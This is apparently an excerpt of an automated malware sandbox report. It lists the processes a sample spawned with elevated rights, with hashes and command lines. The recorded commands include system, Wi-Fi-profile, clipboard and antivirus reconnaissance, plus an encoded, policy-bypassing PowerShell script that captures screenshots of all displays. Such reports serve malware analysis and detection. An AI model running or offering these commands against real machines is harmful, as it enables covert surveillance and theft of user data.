                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                      Start time:03:42:05
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff642e70000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                      Start time:03:42:05
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                      Start time:03:42:05
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                                                      Start time:03:42:05
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                      Imagebase:0x7ff69e180000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                      Start time:03:42:05
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:netsh wlan show profile
                                                                                                                                                                                                                                      Imagebase:0x7ff6338c0000
                                                                                                                                                                                                                                      File size:96'768 bytes
                                                                                                                                                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:40
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:systeminfo
                                                                                                                                                                                                                                      Imagebase:0x7ff647f20000
                                                                                                                                                                                                                                      File size:110'080 bytes
                                                                                                                                                                                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:43
                                                                                                                                                                                                                                      Start time:03:42:11
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
                                                                                                                                                                                                                                      Imagebase:0x7ff69afe0000
                                                                                                                                                                                                                                      File size:2'759'232 bytes
                                                                                                                                                                                                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                                                      Start time:03:42:10
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:45
                                                                                                                                                                                                                                      Start time:03:42:10
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:46
                                                                                                                                                                                                                                      Start time:03:42:11
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
